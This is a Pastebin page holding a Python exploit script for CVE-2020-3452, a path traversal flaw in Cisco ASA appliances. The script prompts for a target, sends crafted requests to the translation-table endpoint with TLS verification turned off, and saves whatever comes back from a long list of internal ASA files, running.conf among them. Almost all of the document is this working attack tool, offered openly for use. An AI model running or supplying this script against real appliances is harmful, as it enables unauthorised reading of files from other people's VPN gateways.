Advertisement
FlyFar

CVE-2020-3452.py - Cisco ASA Path Traversal

Jul 30th, 2023
1,903
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.52 KB | Cybersecurity | 0 0
  1. import os
  2. import requests
  3.  
  4. # Written by freakyclown for @CygentaHQ
  5. # Cisco ASA Path Traversal
  6. # CVE-2020-3452
  7. # Usage: CVE-2020-3452.py {target}"
  8. # Example: CVE-2020-3452.py 192.168.0.12"
  9. # Requires - Requests - pip3 install requests
  10. #
  11. # This tool takes advantage of the above cve and attempts to
  12. # download files as listed below, it is suggested that you make
  13. # a working folder for the outputfiles to avoid confusion if
  14. # attacking mutliple ASA's
  15.  
  16. # set your target
  17. target = input("Enter target IP/Url: ")
  18.  
  19.  
  20. def grabstuff():
  21.     for file in files:
  22.         print("trying: ", file)
  23.  
  24.         #set request parameters
  25.         params = (
  26.             ('type', 'mst'),
  27.             ('textdomain', file),
  28.             ('default-language', ''),
  29.             ('lang', '../'),
  30.         )
  31.  
  32.         # set the response to the result of the request, inputting in target and params and ignoring ssl cert problems
  33.         response = requests.get('https://'+target+'/+CSCOT+/translation-table', params=params, verify=False)
  34.         # write the file to the disk
  35.         directory = os.path.dirname(file)
  36.         if not os.path.exists(directory):
  37.             os.makedirs(directory)
  38.         f = open(file,"w")
  39.         f.write(response.text)
  40.         f.close()
  41.  
  42.  
  43.  
  44. # this is a list of files available to download, more will be added in time
  45. # if anyone has a list of ASA files, I'd be happy to add here
  46. files = {
  47. "+CSCOCA+/ca_inc.lua",
  48. "+CSCOCA+/crl/asa_ca.crl",
  49. "+CSCOCA+/enroll.html",
  50. "+CSCOCA+/login.html",
  51. "+CSCOE+/041235123432C2",
  52. "+CSCOE+/041235123432U2",
  53. "+CSCOE+/app_index.html",
  54. "+CSCOE+/appstart.js",
  55. "+CSCOE+/appstatus",
  56. "+CSCOE+/ask.html",
  57. "+CSCOE+/auth.html",
  58. "+CSCOE+/autosignon_api.js",
  59. "+CSCOE+/blank.html",
  60. "+CSCOE+/cedf.html",
  61. "+CSCOE+/cedhelp.html",
  62. "+CSCOE+/ced.html",
  63. "+CSCOE+/cedlogon.html",
  64. "+CSCOE+/cedmain.html",
  65. "+CSCOE+/cedportal.html",
  66. "+CSCOE+/cedsave.html",
  67. "+CSCOE+/cert.html",
  68. "+CSCOE+/color_picker.html",
  69. "+CSCOE+/color_picker.js",
  70. "+CSCOE+/common.js",
  71. "+CSCOE+/commonspawn.js",
  72. "+CSCOE+/display_bookmarks.lua",
  73. "+CSCOE+/files/browse.html",
  74. "+CSCOE+/files/domains_retr",
  75. "+CSCOE+/files/file_action.html",
  76. "+CSCOE+/files/files.js",
  77. "+CSCOE+/files/files_retr",
  78. "+CSCOE+/files/webfolder",
  79. "+CSCOE+/files/wfolder",
  80. "+CSCOE+/gp-gip.html",
  81. "+CSCOE+/handler",
  82. "+CSCOE+/help/webvpn_help",
  83. "+CSCOE+/home/index.html",
  84. "+CSCOE+/http_auth.html",
  85. "+CSCOE+/include/browser_inc.lua",
  86. "+CSCOE+/include/common.lua",
  87. "+CSCOE+/include/plugin.lua",
  88. "+CSCOE+/lced.html",
  89. "+CSCOE+/load_bookmarks.lua",
  90. "+CSCOE+/localization_inc.lua",
  91. "+CSCOE+/logo.gif",
  92. "+CSCOE+/logon_custom.css",
  93. "+CSCOE+/logon_forms.js",
  94. "+CSCOE+/logon.html"
  95. "+CSCOE+/logon.html",
  96. "+CSCOE+/logon_redirect.html",
  97. "+CSCOE+/logout.html",
  98. "+CSCOE+/message.html",
  99. "+CSCOE+/noportal.html",
  100. "+CSCOE+/nostcaccess.html",
  101. "+CSCOE+/no_svc.html",
  102. "+CSCOE+/ping.html",
  103. "+CSCOE+/pluginlib.js",
  104. "+CSCOE+/portal_ce.html",
  105. "+CSCOE+/portal.css",
  106. "+CSCOE+/portal_custom.css",
  107. "+CSCOE+/portal_elements.html",
  108. "+CSCOE+/portal_forms.js",
  109. "+CSCOE+/portal.html",
  110. "+CSCOE+/portal_inc.lua",
  111. "+CSCOE+/portal.js",
  112. "+CSCOE+/posturl.html",
  113. "+CSCOE+/preview.html",
  114. "+CSCOE+/relayjar.html",
  115. "+CSCOE+/relaymonjar.html",
  116. "+CSCOE+/relaymonocx.html",
  117. "+CSCOE+/relayocx.html",
  118. "+CSCOE+/running.conf",
  119. "+CSCOE+/saml/sp/acs",
  120. "+CSCOE+/saml/sp/login",
  121. "+CSCOE+/saml/sp/metadata",
  122. "+CSCOE+/save_capture.html",
  123. "+CSCOE+/sdesktop/fail.html",
  124. "+CSCOE+/sdesktop/logout.html",
  125. "+CSCOE+/sdesktop/scan.xml",
  126. "+CSCOE+/sdesktop/tokenrenew.xml",
  127. "+CSCOE+/sdesktop/token.xml",
  128. "+CSCOE+/sdesktop/wait.html",
  129. "+CSCOE+/sdesktop/webstart.xml",
  130. "+CSCOE+/session.js",
  131. "+CSCOE+/session_password.html",
  132. "+CSCOE+/sess_update.html",
  133. "+CSCOE+/shshim",
  134. "+CSCOE+/shshimdo_url",
  135. "+CSCOE+/smart_tunnel_install.html",
  136. "+CSCOE+/st_dl.json",
  137. "+CSCOE+/svc.html",
  138. "+CSCOE+/tlbr",
  139. "+CSCOE+/tlbrportal_forms.js",
  140. "+CSCOE+/tunnel_linux.jnlp",
  141. "+CSCOE+/tunnel_mac.html",
  142. "+CSCOE+/tunnel_mac.jnlp",
  143. "+CSCOE+/useralert.html",
  144. "+CSCOE+/user_dialog.html",
  145. "+CSCOE+/win.js",
  146. "+CSCOE+/wrong_url.html",
  147. "+CSCOL+/cte_fallback.js",
  148. "+CSCOL+/cte.js",
  149. "+CSCOL+/relayparam.js",
  150. "+CSCOL+/sw.js",
  151. "+CSCOL+/xsl.js",
  152. "CSCOSSLC/config-auth",
  153. "+CSCOT+/oem-customization",
  154. "+CSCOT+/translation",
  155. "+CSCOT+/translation-table",
  156. "+CSCOU+/anyconnect_unsupported_version.html",
  157. "+CSCOU+/anyconnect_wrong_url.html",
  158. "+CSCOU+/portal.css",
  159. "+CSCOU+/sample.html",
  160. "locale/manifest_data.lua"
  161. }
  162.  
  163.  
  164. # Trying....
  165. try:
  166.     grabstuff()
  167. except Exception as err:
  168.     print("Something went wrong, sorry")
  169.     print(err)
  170.  
  171.  
Tags: Exploit asa cisco
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement